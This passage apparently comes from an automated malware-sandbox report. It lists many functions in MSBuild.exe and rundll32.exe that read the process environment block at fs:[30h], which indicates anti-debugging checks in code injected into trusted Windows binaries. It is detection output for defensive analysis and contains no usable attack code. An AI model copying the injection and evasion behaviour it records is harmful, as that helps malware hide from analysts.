                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010D4D3B mov eax, dword ptr fs:[00000030h]3_2_010D4D3B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010AAD30 mov eax, dword ptr fs:[00000030h]3_2_010AAD30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010B3D34 mov eax, dword ptr fs:[00000030h]3_2_010B3D34
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010B3D34 mov eax, dword ptr fs:[00000030h]3_2_010B3D34
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010B3D34 mov eax, dword ptr fs:[00000030h]3_2_010B3D34
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010B3D34 mov eax, dword ptr fs:[00000030h]3_2_010B3D34
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010B3D34 mov eax, dword ptr fs:[00000030h]3_2_010B3D34
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010B3D34 mov eax, dword ptr fs:[00000030h]3_2_010B3D34
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010B3D34 mov eax, dword ptr fs:[00000030h]3_2_010B3D34
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010B3D34 mov eax, dword ptr fs:[00000030h]3_2_010B3D34
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010B3D34 mov eax, dword ptr fs:[00000030h]3_2_010B3D34
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010B3D34 mov eax, dword ptr fs:[00000030h]3_2_010B3D34
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010B3D34 mov eax, dword ptr fs:[00000030h]3_2_010B3D34
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010B3D34 mov eax, dword ptr fs:[00000030h]3_2_010B3D34
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010B3D34 mov eax, dword ptr fs:[00000030h]3_2_010B3D34
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010E3D43 mov eax, dword ptr fs:[00000030h]3_2_010E3D43
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01123540 mov eax, dword ptr fs:[00000030h]3_2_01123540
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010C7D50 mov eax, dword ptr fs:[00000030h]3_2_010C7D50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010CC577 mov eax, dword ptr fs:[00000030h]3_2_010CC577
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010CC577 mov eax, dword ptr fs:[00000030h]3_2_010CC577
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010A2D8A mov eax, dword ptr fs:[00000030h]3_2_010A2D8A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010A2D8A mov eax, dword ptr fs:[00000030h]3_2_010A2D8A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010A2D8A mov eax, dword ptr fs:[00000030h]3_2_010A2D8A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010A2D8A mov eax, dword ptr fs:[00000030h]3_2_010A2D8A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010A2D8A mov eax, dword ptr fs:[00000030h]3_2_010A2D8A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010D2581 mov eax, dword ptr fs:[00000030h]3_2_010D2581
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010D2581 mov eax, dword ptr fs:[00000030h]3_2_010D2581
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010D2581 mov eax, dword ptr fs:[00000030h]3_2_010D2581
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010D2581 mov eax, dword ptr fs:[00000030h]3_2_010D2581
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010DFD9B mov eax, dword ptr fs:[00000030h]3_2_010DFD9B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010DFD9B mov eax, dword ptr fs:[00000030h]3_2_010DFD9B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010D35A1 mov eax, dword ptr fs:[00000030h]3_2_010D35A1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010D1DB5 mov eax, dword ptr fs:[00000030h]3_2_010D1DB5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010D1DB5 mov eax, dword ptr fs:[00000030h]3_2_010D1DB5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010D1DB5 mov eax, dword ptr fs:[00000030h]3_2_010D1DB5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_011705AC mov eax, dword ptr fs:[00000030h]3_2_011705AC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_011705AC mov eax, dword ptr fs:[00000030h]3_2_011705AC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01126DC9 mov eax, dword ptr fs:[00000030h]3_2_01126DC9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01126DC9 mov eax, dword ptr fs:[00000030h]3_2_01126DC9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01126DC9 mov eax, dword ptr fs:[00000030h]3_2_01126DC9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01126DC9 mov ecx, dword ptr fs:[00000030h]3_2_01126DC9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01126DC9 mov eax, dword ptr fs:[00000030h]3_2_01126DC9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01126DC9 mov eax, dword ptr fs:[00000030h]3_2_01126DC9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01158DF1 mov eax, dword ptr fs:[00000030h]3_2_01158DF1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010BD5E0 mov eax, dword ptr fs:[00000030h]3_2_010BD5E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010BD5E0 mov eax, dword ptr fs:[00000030h]3_2_010BD5E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0116FDE2 mov eax, dword ptr fs:[00000030h]3_2_0116FDE2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0116FDE2 mov eax, dword ptr fs:[00000030h]3_2_0116FDE2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0116FDE2 mov eax, dword ptr fs:[00000030h]3_2_0116FDE2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0116FDE2 mov eax, dword ptr fs:[00000030h]3_2_0116FDE2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01161C06 mov eax, dword ptr fs:[00000030h]3_2_01161C06
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01161C06 mov eax, dword ptr fs:[00000030h]3_2_01161C06
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01161C06 mov eax, dword ptr fs:[00000030h]3_2_01161C06
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01161C06 mov eax, dword ptr fs:[00000030h]3_2_01161C06
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01161C06 mov eax, dword ptr fs:[00000030h]3_2_01161C06
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01161C06 mov eax, dword ptr fs:[00000030h]3_2_01161C06
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01161C06 mov eax, dword ptr fs:[00000030h]3_2_01161C06
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01161C06 mov eax, dword ptr fs:[00000030h]3_2_01161C06
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01161C06 mov eax, dword ptr fs:[00000030h]3_2_01161C06
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01161C06 mov eax, dword ptr fs:[00000030h]3_2_01161C06
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01161C06 mov eax, dword ptr fs:[00000030h]3_2_01161C06
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01161C06 mov eax, dword ptr fs:[00000030h]3_2_01161C06
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01161C06 mov eax, dword ptr fs:[00000030h]3_2_01161C06
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01161C06 mov eax, dword ptr fs:[00000030h]3_2_01161C06
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01126C0A mov eax, dword ptr fs:[00000030h]3_2_01126C0A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01126C0A mov eax, dword ptr fs:[00000030h]3_2_01126C0A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01126C0A mov eax, dword ptr fs:[00000030h]3_2_01126C0A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01126C0A mov eax, dword ptr fs:[00000030h]3_2_01126C0A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0117740D mov eax, dword ptr fs:[00000030h]3_2_0117740D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0117740D mov eax, dword ptr fs:[00000030h]3_2_0117740D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0117740D mov eax, dword ptr fs:[00000030h]3_2_0117740D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010DBC2C mov eax, dword ptr fs:[00000030h]3_2_010DBC2C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0113C450 mov eax, dword ptr fs:[00000030h]3_2_0113C450
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0113C450 mov eax, dword ptr fs:[00000030h]3_2_0113C450
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010DA44B mov eax, dword ptr fs:[00000030h]3_2_010DA44B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010C746D mov eax, dword ptr fs:[00000030h]3_2_010C746D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010B849B mov eax, dword ptr fs:[00000030h]3_2_010B849B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01178CD6 mov eax, dword ptr fs:[00000030h]3_2_01178CD6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01126CF0 mov eax, dword ptr fs:[00000030h]3_2_01126CF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01126CF0 mov eax, dword ptr fs:[00000030h]3_2_01126CF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01126CF0 mov eax, dword ptr fs:[00000030h]3_2_01126CF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_011614FB mov eax, dword ptr fs:[00000030h]3_2_011614FB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0113FF10 mov eax, dword ptr fs:[00000030h]3_2_0113FF10
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0113FF10 mov eax, dword ptr fs:[00000030h]3_2_0113FF10
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010DA70E mov eax, dword ptr fs:[00000030h]3_2_010DA70E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010DA70E mov eax, dword ptr fs:[00000030h]3_2_010DA70E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0117070D mov eax, dword ptr fs:[00000030h]3_2_0117070D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0117070D mov eax, dword ptr fs:[00000030h]3_2_0117070D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010CF716 mov eax, dword ptr fs:[00000030h]3_2_010CF716
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010A4F2E mov eax, dword ptr fs:[00000030h]3_2_010A4F2E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010A4F2E mov eax, dword ptr fs:[00000030h]3_2_010A4F2E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010DE730 mov eax, dword ptr fs:[00000030h]3_2_010DE730
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010BEF40 mov eax, dword ptr fs:[00000030h]3_2_010BEF40
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010BFF60 mov eax, dword ptr fs:[00000030h]3_2_010BFF60
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01178F6A mov eax, dword ptr fs:[00000030h]3_2_01178F6A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01127794 mov eax, dword ptr fs:[00000030h]3_2_01127794
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01127794 mov eax, dword ptr fs:[00000030h]3_2_01127794
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01127794 mov eax, dword ptr fs:[00000030h]3_2_01127794
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010B8794 mov eax, dword ptr fs:[00000030h]3_2_010B8794
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010E37F5 mov eax, dword ptr fs:[00000030h]3_2_010E37F5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010AC600 mov eax, dword ptr fs:[00000030h]3_2_010AC600
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010AC600 mov eax, dword ptr fs:[00000030h]3_2_010AC600
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010AC600 mov eax, dword ptr fs:[00000030h]3_2_010AC600
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010D8E00 mov eax, dword ptr fs:[00000030h]3_2_010D8E00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010DA61C mov eax, dword ptr fs:[00000030h]3_2_010DA61C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010DA61C mov eax, dword ptr fs:[00000030h]3_2_010DA61C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01161608 mov eax, dword ptr fs:[00000030h]3_2_01161608
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0115FE3F mov eax, dword ptr fs:[00000030h]3_2_0115FE3F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010AE620 mov eax, dword ptr fs:[00000030h]3_2_010AE620
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010B7E41 mov eax, dword ptr fs:[00000030h]3_2_010B7E41
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010B7E41 mov eax, dword ptr fs:[00000030h]3_2_010B7E41
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010B7E41 mov eax, dword ptr fs:[00000030h]3_2_010B7E41
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010B7E41 mov eax, dword ptr fs:[00000030h]3_2_010B7E41
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010B7E41 mov eax, dword ptr fs:[00000030h]3_2_010B7E41
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010B7E41 mov eax, dword ptr fs:[00000030h]3_2_010B7E41
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0116AE44 mov eax, dword ptr fs:[00000030h]3_2_0116AE44
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0116AE44 mov eax, dword ptr fs:[00000030h]3_2_0116AE44
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010B766D mov eax, dword ptr fs:[00000030h]3_2_010B766D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010CAE73 mov eax, dword ptr fs:[00000030h]3_2_010CAE73
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010CAE73 mov eax, dword ptr fs:[00000030h]3_2_010CAE73
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010CAE73 mov eax, dword ptr fs:[00000030h]3_2_010CAE73
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010CAE73 mov eax, dword ptr fs:[00000030h]3_2_010CAE73
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010CAE73 mov eax, dword ptr fs:[00000030h]3_2_010CAE73
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0113FE87 mov eax, dword ptr fs:[00000030h]3_2_0113FE87
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01170EA5 mov eax, dword ptr fs:[00000030h]3_2_01170EA5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01170EA5 mov eax, dword ptr fs:[00000030h]3_2_01170EA5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01170EA5 mov eax, dword ptr fs:[00000030h]3_2_01170EA5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_011246A7 mov eax, dword ptr fs:[00000030h]3_2_011246A7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01178ED6 mov eax, dword ptr fs:[00000030h]3_2_01178ED6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010D36CC mov eax, dword ptr fs:[00000030h]3_2_010D36CC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010E8EC7 mov eax, dword ptr fs:[00000030h]3_2_010E8EC7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0115FEC0 mov eax, dword ptr fs:[00000030h]3_2_0115FEC0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010B76E2 mov eax, dword ptr fs:[00000030h]3_2_010B76E2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010D16E0 mov ecx, dword ptr fs:[00000030h]3_2_010D16E0
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0441A44B mov eax, dword ptr fs:[00000030h]7_2_0441A44B
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04400050 mov eax, dword ptr fs:[00000030h]7_2_04400050
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04400050 mov eax, dword ptr fs:[00000030h]7_2_04400050
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_043FB02A mov eax, dword ptr fs:[00000030h]7_2_043FB02A
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_043FB02A mov eax, dword ptr fs:[00000030h]7_2_043FB02A
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_043FB02A mov eax, dword ptr fs:[00000030h]7_2_043FB02A
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_043FB02A mov eax, dword ptr fs:[00000030h]7_2_043FB02A
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0447C450 mov eax, dword ptr fs:[00000030h]7_2_0447C450
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0447C450 mov eax, dword ptr fs:[00000030h]7_2_0447C450
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0440746D mov eax, dword ptr fs:[00000030h]7_2_0440746D
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_044A2073 mov eax, dword ptr fs:[00000030h]7_2_044A2073
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_044B1074 mov eax, dword ptr fs:[00000030h]7_2_044B1074
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_044B740D mov eax, dword ptr fs:[00000030h]7_2_044B740D
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_044B740D mov eax, dword ptr fs:[00000030h]7_2_044B740D
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_044B740D mov eax, dword ptr fs:[00000030h]7_2_044B740D
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_044A1C06 mov eax, dword ptr fs:[00000030h]7_2_044A1C06
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_044A1C06 mov eax, dword ptr fs:[00000030h]7_2_044A1C06
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_044A1C06 mov eax, dword ptr fs:[00000030h]7_2_044A1C06
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_044A1C06 mov eax, dword ptr fs:[00000030h]7_2_044A1C06
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_044A1C06 mov eax, dword ptr fs:[00000030h]7_2_044A1C06
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_044A1C06 mov eax, dword ptr fs:[00000030h]7_2_044A1C06
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_044A1C06 mov eax, dword ptr fs:[00000030h]7_2_044A1C06
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_044A1C06 mov eax, dword ptr fs:[00000030h]7_2_044A1C06
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_044A1C06 mov eax, dword ptr fs:[00000030h]7_2_044A1C06
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_044A1C06 mov eax, dword ptr fs:[00000030h]7_2_044A1C06
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_044A1C06 mov eax, dword ptr fs:[00000030h]7_2_044A1C06
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_044A1C06 mov eax, dword ptr fs:[00000030h]7_2_044A1C06
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_044A1C06 mov eax, dword ptr fs:[00000030h]7_2_044A1C06
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_044A1C06 mov eax, dword ptr fs:[00000030h]7_2_044A1C06
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04466C0A mov eax, dword ptr fs:[00000030h]7_2_04466C0A
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04466C0A mov eax, dword ptr fs:[00000030h]7_2_04466C0A
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04466C0A mov eax, dword ptr fs:[00000030h]7_2_04466C0A
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04466C0A mov eax, dword ptr fs:[00000030h]7_2_04466C0A
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04467016 mov eax, dword ptr fs:[00000030h]7_2_04467016
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04467016 mov eax, dword ptr fs:[00000030h]7_2_04467016
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04467016 mov eax, dword ptr fs:[00000030h]7_2_04467016
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_044B4015 mov eax, dword ptr fs:[00000030h]7_2_044B4015
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_044B4015 mov eax, dword ptr fs:[00000030h]7_2_044B4015
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0441002D mov eax, dword ptr fs:[00000030h]7_2_0441002D
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0441002D mov eax, dword ptr fs:[00000030h]7_2_0441002D
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0441002D mov eax, dword ptr fs:[00000030h]7_2_0441002D
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0441002D mov eax, dword ptr fs:[00000030h]7_2_0441002D
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0441002D mov eax, dword ptr fs:[00000030h]7_2_0441002D
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0441BC2C mov eax, dword ptr fs:[00000030h]7_2_0441BC2C
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0447B8D0 mov eax, dword ptr fs:[00000030h]7_2_0447B8D0
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0447B8D0 mov ecx, dword ptr fs:[00000030h]7_2_0447B8D0
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0447B8D0 mov eax, dword ptr fs:[00000030h]7_2_0447B8D0
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0447B8D0 mov eax, dword ptr fs:[00000030h]7_2_0447B8D0
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0447B8D0 mov eax, dword ptr fs:[00000030h]7_2_0447B8D0
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0447B8D0 mov eax, dword ptr fs:[00000030h]7_2_0447B8D0
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_044B8CD6 mov eax, dword ptr fs:[00000030h]7_2_044B8CD6
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_043F849B mov eax, dword ptr fs:[00000030h]7_2_043F849B
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_044A14FB mov eax, dword ptr fs:[00000030h]7_2_044A14FB
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04466CF0 mov eax, dword ptr fs:[00000030h]7_2_04466CF0
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04466CF0 mov eax, dword ptr fs:[00000030h]7_2_04466CF0
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04466CF0 mov eax, dword ptr fs:[00000030h]7_2_04466CF0
